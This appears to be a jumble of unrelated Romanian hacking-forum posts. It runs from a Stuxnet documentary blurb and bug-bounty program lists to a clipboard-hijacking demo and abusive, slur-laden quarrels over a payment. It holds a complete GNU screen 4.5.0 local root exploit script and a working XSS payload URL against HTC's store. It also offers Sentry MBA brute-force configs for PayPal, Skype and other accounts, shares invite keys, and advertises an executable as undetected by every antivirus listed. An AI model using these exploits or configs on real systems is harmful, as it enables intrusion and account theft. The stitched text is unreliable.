Leaderboard

retete-picante.ro

Documentary thriller about warfare in a world without rules - the world of cyberwar. It tells the story of Stuxnet, self-replicating computer malware, known as a 'worm' for its ability to burrow from computer to computer on its own. In a covert operation, the American and Israeli intelligence agencies allegedly unleashed Stuxnet to destroy a key part of an Iranian nuclear facility. Ultimately the 'worm' spread beyond its intended target. Zero Day is the most comprehensive account to date of how a clandestine mission opened forever the Pandora's box of cyber warfare. A cautionary tale of technology, politics, unintended consequences, morality, and the dangers of secrecy. Link: http://www.bbc.co.uk/iplayer/episode/b08bcc18/storyville-zero-days-nuclear-cyber-sabotage Download: https://katcr.co/new/torrents-details.php?id=17952

Most of the time when we see a code snippet online to do something, we often blindly copy paste it to the terminal. Even the tech savy ones just see it on the website before copy pasting. Here is why you shouldn't do this. You probably guessed it. There is some malicious code between ls and -lat that is hidden from the user Malicious code's color is set to that of the background, it's font size is set to 0, it is moved away from rest of the code and it is made un-selectable (that blue color thing doesn't reveal it); to make sure that it works in all possible OSes, browsers and screen sizes. .malicious { color: #f3f5f6; // set it to that of the page font-size: 0px; // make it small // move it out of the way position: absolute; left: -100px; top: -100px; height: 0px; z-index: -100; display: inline-block; // make it un-selectable -webkit-touch-callout: none; -webkit-user-select: none; -khtml-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } <span>ls</span> <span class="malicious"> ; clear; echo 'Haha! You gave me access to your computer with sudo!'; echo -ne 'h4cking ## (10%)\r'; sleep 0.3; echo -ne 'h4cking ### (20%)\r'; sleep 0.3; echo -ne 'h4cking ##### (33%)\r'; sleep 0.3; echo -ne 'h4cking ####### (40%)\r'; sleep 0.3; echo -ne 'h4cking ########## (50%)\r'; sleep 0.3; echo -ne 'h4cking ############# (66%)\r'; sleep 0.3; echo -ne 'h4cking ##################### (99%)\r'; sleep 0.3; echo -ne 'h4cking ####################### (100%)\r'; echo -ne '\n'; echo 'Hacking complete.'; echo 'Use GUI interface using visual basic to track my IP'<br> ls </span> <span>-lat </span> This can be worse. If the code snippet had a command with sudo for instance, the malicious code will have sudo access too. Or, it can silently install a keylogger on your machine; possibilities are endless. So, the lesson here is, make sure that you paste code snippets from untrusted sources onto a text editor before executing it. Sursa si locul in care apare comanda asa cum ar trebui sa fie copiata daca vreti sa incercati.

Vom mentine aici o lista cu site-urile care au un program bug bounty. Google http://www.google.com/about/appsecurity/reward-program/ Facebook https://www.facebook.com/whitehat/bounty Mozilla http://www.mozilla.org/security/bug-bounty.html Paypal https://www.paypal.com/us/webapps/mpp/security/reporting-security-issues Secunia http://secunia.com/community/research/svcrp/ Etsy http://codeascraft.etsy.com/2012/09/11/announcing-the-etsy-security-bug-bounty-program/ Barracuda http://www.barracudalabs.com/bugbounty/ ---------------------------------------------------------------------------------------------- Site-uri care vor mentiona persoanele care le raporteaza vulnerabilitati: Adobe http://www.adobe.com/support/security/alertus.html Twitter https://twitter.com/about/security EBay http://pages.ebay.com/securitycenter/ResearchersAcknowledgement.html Microsoft http://technet.microsoft.com/en-us/security/ff852094.aspx Apple http://support.apple.com/kb/HT1318 Dropbox https://www.dropbox.com/security Reddit http://code.reddit.com/wiki/help/whitehat Github https://help.github.com/articles/responsible-disclosure-of-security-vulnerabilities Ifixit http://www.ifixit.com/Info/responsible_disclosure 37 Signals http://37signals.com/security-response Twilio http://www.twilio.com/blog/2012/03/reporting-security-vulnerabilities.html Constant Contact http://www.constantcontact.com/about-constant-contact/security/report-vulnerability.jsp Engine Yard http://www.engineyard.com/legal/responsible-disclosure-policy Lastpass https://lastpass.com/support_security.php RedHat https://access.redhat.com/knowledge/articles/66234 Acquia https://www.acquia.com/how-report-security-issue Zynga http://company.zynga.com/security/whitehats Owncloud http://owncloud.org/security/policy Tuenti http://corporate.tuenti.com/en/dev/hall-of-fame Soundcloud http://help.soundcloud.com/customer/portal/articles/439715-responsible-disclosure Nokia Siemens Networks http://www.nokiasiemensnetworks.com/about-us/responsible-disclosure Yandex Bug Bounty http://company.yandex.com/security/hall-of-fame.xml Lista originala: List of Bug Bounty program for PenTesters and Ethical Hackers - E Hacker News Lista este in curs de actualizare. Daca aveti ceva de completat, postati in acest topic si vom actualiza si aici.

Furk.net is your personal secure storage that fetches media files and lets you stream them immediately You can use it to stream video or listen to your music from PC, smartphone, HTPC or even a game console (XBOX, PS3). Service limits: Bandwidth limit: up to 250GB per month Disk storage limit: unlimited (as long as files are from public sources) Invite key: M2LYNJEKR N6PYUOECT E9OL6IWB9 1S91EF5X2 1KASOFR8I 2GQV8R5UN Cine foloseste un key sa anunte.

Al Salamu alaykom All of know Sentry MBA, for who does'nt know it, it's a software used to perform brute force attacks ( accounts, websites ... ) i will not talk so much about the usage of sentry MBA ( like i said in the title it's just for configs) but if you are interested on sentry mba you can read this article on my blog. Read the article Now for the configs : SKYPE CONFIG : DOWNLOAD BANGBROS CONFIG : DOWNLOAD PAYPAL CONFIG : DOWNLOAD BRAZZERS CONFIG : DOWNLOAD MOFOS ELITE CONFIG : DOWNLOAD REALITY KINGS CONFIG : DOWNLOAD LIVE JASMINE CONFIG : DOWNLOAD UPLOADED.TO CONFIG : DOWNLOAD ORIGIN CONFIG : DOWNLOAD IMLIVE CONFIG : DOWNLOAD NETLOAD CONFIG : DOWNLOAD RAPID GATOR CONFIG : DOWNLOAD PORNHUB CONFIG : DOWNLOAD EARTH VPN CONFIG : DOWNLOAD LOL CONFIG : DOWNLOAD MEDIAFIRE CONFIG : DOWNLOAD HMA CONFIG : DOWNLOAD CAM4 CONFIG : DOWNLOAD Good bye :">

Singur zici ca "am zis ca dureaza 1h" lucru care mi-l asum iar tu imediat dupa plata la nici 10 minute ai postat topic-ul iar din (1 ora aia) mai era timp de asteptat ca nu trecuse. Te intelegi , esti frustrat ai vrut sa ma arzi tu pe mine si dovedesti asta din imaginea cu btc-ul tau in care tu numai avea nici macar 1$. Inteleg ca nu ai reusit sa afli ceea ce te framanta si nici nu vei afla ca o sa o pun eu in tema cu un mesaj pe facebook, eventual unul si pe e-mail ca sa fie treaba ta ...

iti zic ca esti ratat, ai postat la categoria gresita. nici nu-ti citesti topicul.

Deci din cate se pare ca te contrazici singur. Tot tu zici ca de ce nu am mai raspuns cand ai zis ca ai trimis o parte , tot tu zici ca am zis ca revin in 1h. De injurat nu stiu cine injura ca eu nu vad nici o injuratura daca te simti frustrat ca ai pierdut ceva e treaba ta. Stai linistit ca nu mie frica ai postat aici atata timp cat eu vin cu log-uri ! Din cate se pare uite tot tu continui sa dai mesaje pe RST ! Vrei sa o caut sa o postez si pe aia cand iti spun ca am ceva treaba ("deaia nu raspund") si ca iti trimit eu inapoi raspunsul cu totul ? Sau recunosti tu direct ?

Bai muie in cur, in primul rand tu esti rupt in gura de foame ci nu eu. In al doilea rand daca ti-ai furat`o pe alte forumuri e treaba ta. In al treilea rand traiesti ca in vremea mirc-ului "gata" "am facut" "hai dai paste" ... "aaa" "gata mai ars" Ca sa arat la lume si la restul eu comparativ cu tine am o reputatie buna aici pe forum, am o vechime comparativ cu tine si nu stau sa ma pretez la 40 de euro precum crezi tu. Ca drept dovada am mai jos 4 screen-shot-uri cum iti dau bani inapoi, si numai continuam nici pentru 500 de euro pentru ca esti un copil prost . In plus de asta tin sa anunt ca din momentul transferari banilor si pana in momentul postarii acestui topic nu a durat mai mult de 10 minute, timp in care eu iam spus ca mai am de lucru Daca este nevoie pot posta toata discutia cu el care oricum nu sa intamplat in mesajele private RST ci doar mail to mail, da o fac pentru o convingere mai buna ! In plus de asta acuma vad dupa acest "Edit" dupa cum tot tu singur spui ca urma sa ii mai transfer o parte de 40 de euro ? iar in contul tau de btc este suma de 0$ ? de unde apareau si ceilalanti 40 ? " Rog un admin sa ia o decizie iar daca considera ca merit vreun warn il accept cu placere pentru ca raspund la toti copii prosti dupa forum. Va multumesc

Geez, need new, bigger tinfoil hat.

#!/bin/bash # screenroot.sh # setuid screen v4.5.0 local root exploit # abuses ld.so.preload overwriting to get root. # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html # HACK THE PLANET # ~ infodox (25/1/2017) echo "~ gnu/screenroot ~" echo "[+] First, we create our shell and library..." cat << EOF > /tmp/libhax.c #include <stdio.h> #include <sys/types.h> #include <unistd.h> __attribute__ ((__constructor__)) void dropshell(void){ chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755); unlink("/etc/ld.so.preload"); printf("[+] done!\n"); } EOF gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c rm -f /tmp/libhax.c cat << EOF > /tmp/rootshell.c #include <stdio.h> int main(void){ setuid(0); setgid(0); seteuid(0); setegid(0); execvp("/bin/sh", NULL, NULL); } EOF gcc -o /tmp/rootshell /tmp/rootshell.c rm -f /tmp/rootshell.c echo "[+] Now we create our /etc/ld.so.preload file..." cd /etc umask 000 # because screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed echo "[+] Triggering..." screen -ls # screen itself is setuid, so... /tmp/rootshell

Free download aHR0cDovL3guY28vNmxuZnM= or buy

@FaNelutu , ma nene, sunt vreo doi ani decand nu a vorbit cineva in topicul asta. Probabil cine l-a deschis a si murit intre timp :))) Curentat.

AGSQ: Mai dute ma in pula mea de tigan mustacios cu tot cu SRL-ul pulei mele de 200 de lei capital social si sediu social in pizda pe campuri unde nu aveti nici canalizare. Tu compari o corporatie cu cacatul tau de SRL si 400 euro incasari lunare? Cum adica server reutilizat? Tu dupa ce foloseste clientul o luna serverul, il arunci ? Pai ce flocii lu ma-ta grasa, serverul e prezervativ ? Besi in pula mea de ratat cu aberatiile si comparatiile tale de doi lei.

PRIVATE BUGBOUNTY AM PRIMIT 2 VPS SI 1 DOMENIU PENTRU 1 AN. STATUS:FIXED

Step 1) Start reading! There are some go-to books that you can buy to help you learn the basics and essentials of penetration testing and bug hunting. Since bug bounties often include website targets, we’ll focus on getting you started with Web Hacking and later we’ll branch out. Note -> It's very important to focus on an area of hacking that is interesting & exciting to you. Focus on that one area and pick up new things as you go, but don’t try to be the “ultimate hacker” and learn everything. The greatest hackers on Bugcrowd have specialities and areas of interest, but they don’t know how to hack everything. Hacking is a lifelong journey of learning. Your two go-to books are the following: The Web Application Hacker’s Handbook256 This is an absolute must-read and considered the web-app hacker’s ‘bible’. This book starts from square one, walking you through getting Kali Linux installed all the way through using tools and finding exploits. OWASP Testing Guide v4968 Highly suggested by Bugcrowd’s Jason Haddix For further reading: Penetration Testing102 The Hacker Playbook 2: Practical Guide to Penetration Testing75 And for our Mobile hacking friends: The Mobile Application Hacker’s Handbook50 iOS Application Security27 Step 2) Practice what you’re learning! While you’re learning it’s important to make sure that you’re also understanding and retaining what you learn. Practicing on vulnerable applications and systems is a great way to test your skills in simulated environments. These will give you an idea of what you’ll run up against in the real world. Hacksplaining1.1k This is a great site to learn a bit more about various web hacking techniques and how they’re done. It’s actually more of a practical walk-through. Super useful! Penetration Testing Practice Labs911 This site has a massive list of practice apps and systems for several hacking scenarios. Use this list to find new testing labs and sites to practice your skills. Step 3) Read tech write-ups and POCs (Proof of Concepts) from other hackers and watch tutorials on YouTube! Now that you’ve got a baseline understanding of how to find and exploit security vulnerabilities, it’s time to start checking out what other hackers are finding in the wild. Luckily the security community is quite generous with sharing knowledge and we’ve collected a list of write-ups & tutorials: Bug Bounty write-ups and POCs Collection of bug reports from successful bug bounty hunters. Bug Hunting Tutorials Our collection of great tutorials from the Bugcrowd community and beyond. /r/Netsec on Reddit236 Netsec on Reddit is almost exclusively tech writeups and POCs from other researchers. A fantastic resource. JackkTutorials on YouTube330 Jackk has created many tutorials that walk you through CSRF, XSS, SQL Injection, Target Discovery and much more. DEFCON Conference videos on YouTube118 Watch all of the talks from DEFCON over the years. Very useful resource. Hak5 on YouTube112 Hak5 typically focuses on hardware hacking, but in addition to that they also have the ‘Metasploit Minute’ show, HakTip: NMap and much more. Awesome-Infosec189 This is a curated list of helpful security resources that covers many different topics and areas. Step 3-A) Gather your arsenal of tools Tools don’t make the hacker, but they’re certainly helpful! Bugcrowd has curated an extensive list of tools that you can add to your bag of tricks: Bugcrowd Researcher Resources - Tools Step 4) Join the community! You’re joining a global community of over 29,000 hackers. Luckily many of these hackers are happy to share their knowledge with a fellow polite & curious researcher. Follow White-Hat Hackers on Twitter269 A list of bug bounty hunters that you should be following. Join the #Bugcrowd IRC channel103 to talk to over 100 security researchers Follow @Bugcrowd on Twitter62 to keep up with the latest infosec news Join the Bugcrowd Forum57 for more resources & to chat with other researchers Step 5) Start learning about bug bounties Okay, now you’re at the point where it’s almost time to start hunting for bounties. But first, let’s learn how bug bounties work and how to get started, just to make sure we maximize our chances of success. How to approach a target Advice from other bug hunters that will help you find more success when approaching a bug bounty. How to write a Great Vulnerability Report100 This will walk you through how to write a great vulnerability report. The better your report, the higher chance you will get a bounty! How to write a Proof of Concept65 Proof of Concepts show the customer how your bug is exploited and that it works. This is crucial to being rewarded successfully. How to Report a Bug51 Our walkthrough for reporting a bug via the Bugcrowd platform. Bug Bounty Disclosure Policy46 These are the rules of the road. It’s very important that you understand the bounty program’s bounty brief and disclosure policy. Read the Bounty Hunter's Methodology This is a presentation that @jhaddix gave at DEFCON last year and it's a super useful look at how successful bounty hunters find bugs. Check out the Github and watch the video88. How To Shot Web - Jason Haddix's talk from DEFCON23 Step 6) Get hacking! It’s time to start hacking! When you’re new and getting started, it’s probably best not to try hacking the most popular bug bounties out there. Trying to hack Tesla Motors, Facebook, Pinterest and others will likely end in frustration for beginners, as those companies are very popular and are more secure because they receive many bug reports. Go for the Kudos only programs297 Instead, focus on bug bounties that have likely been overlooked by others. These are often bug bounties that don’t pay rewards but instead offer kudos points on Bugcrowd. These ‘kudos points only’ programs297 are a fantastic way to get started with bug bounties and to show your skills to Bugcrowd. After you’ve submitted some valid bugs to Bugcrowd, even if they’re kudos rewards only, you will likely start receiving invites to private bounty programs. The private bounty programs are invitation only and restricted to a small number of people, which means less competition and a higher likelihood of successfully finding a bug. Step 7) Always Be Learning & Networking Like we mentioned earlier, hacking is a lifelong journey of learning. This is what makes this field so exciting! There are always new articles and presentations to learn from, interesting people to meet at conferences or local meetups, and new opportunities to pursue. Bug bounties are a fantastic way to enter the InfoSec community and build your career. Use bug bounties as a way to make extra money, improve your skills, meet new people, and even build out your resume. Remember, always act professional and treat people well. This is a small community and we like to take care of each other - you never know who you might meet!

http://estore.htc.com/tw/buy/zh-TW/shop/SearchDisplay?searchTerm=asd'- confirm(document.domain)-'&storeId=10001&catalogId=10001&langId=-7&pageSize =20&beginIndex=0&sType=SimpleSearch&resultCatEntryType=2&showResultsPa ge=true&searchSource=Q&pageView=

//removed File Info: File Name: Comradex.exe SHA1: 3b1db3487d662bcd5e126f2d9d1a9dd254e22fa0 MD5: d3d03405483104ddbce45540dddfd520 Date and Time: 6-02-13,01:48:54 File Size: 797888 Bytes Detection: 0 of 35 Detections: AVG Free Clean ArcaVir Clean Avast 5 Clean AntiVir (Avira) Clean BitDefender Clean VirusBuster Internet Security Clean Clam Antivirus Clean COMODO Internet Security Clean Dr.Web Clean eTrust-Vet Clean F-PROT Antivirus Clean F-Secure Internet Security Clean G Data Clean IKARUS Security Clean Kaspersky Antivirus Clean McAfee Clean MS Security Essentials Clean ESET NOD32 Clean Norman Clean Norton Antivirus Clean Panda Security Clean A-Squared Clean Quick Heal Antivirus Clean Solo Antivirus Clean Sophos Clean Trend Micro Internet Security Clean VBA32 Antivirus Clean Vexira Antivirus Clean Zoner AntiVirus Clean Ad-Aware Clean BullGuard Clean Immunet Anti like this post

---